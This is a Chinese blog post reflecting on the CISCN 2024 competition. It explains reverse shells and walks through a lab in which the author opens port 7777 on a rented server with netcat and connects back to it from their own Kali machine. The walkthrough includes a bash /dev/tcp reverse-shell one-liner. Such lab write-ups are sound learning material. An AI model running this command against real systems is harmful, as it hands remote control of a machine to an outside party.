ciscn2024的一些反思
什么是反弹shellreverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
正向连接
就是我们客户端连服务器
我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接
反向连接
就是让服务器连我们
一般适用于
目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
目标机端口被占用。
目标机位于局域网,或IP会动态变化,攻击机无法直接连接。
对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的
向web里面的话有可能出现在rce当中过滤的函数实在太多,我们只能去实现反向连shell
常见的方式
Bash反弹shell
首先我们先了解下Linux的连接符号和重定向
什么是重定向:
Linux中的重定向就是将原本要输出到屏幕中的数据信息,重新指向某个特定文件当中,或者定向到黑洞文件(/dev/null)中。 ...
反弹shell的实验
反弹shell实验之前国赛ciscn2024坐牢
web题目简直难如登天
但是还是有大佬把题目做出来了,而且用的技术非常高端反弹shell
今天终于抽出时间来做这个反弹shell的实验
首先我们先自己搭建一个自己的服务器(以后自己做题目也得用)这里我用的阿里云,因为它可以试用
网址https://developer.aliyun.com/
这里反弹shell的原理之前讲过了,这里就不讲了
搭建好服务器
第一步先设置服务器,这里需要开放一个端口用来反弹shell,我这里用的7777端口
后续我们也会用这个端口复现下国赛的题目
然后我们用自己的shell来连上我们的服务器
刚连上服务器需要自己下载nc
我们用自己的服务器作为攻击端
用我的kali作为被攻击端
在服务器上
nc -lvvp 7777//监听7777端口
然后在kali上
bash -i >& /dev/tcp/8.xxx.xxx.xxx/7777 0>&1
成功连接上
做这个实验也是花了一些时间
当时没想到服务器要自己去打开端口
没关系成功了就行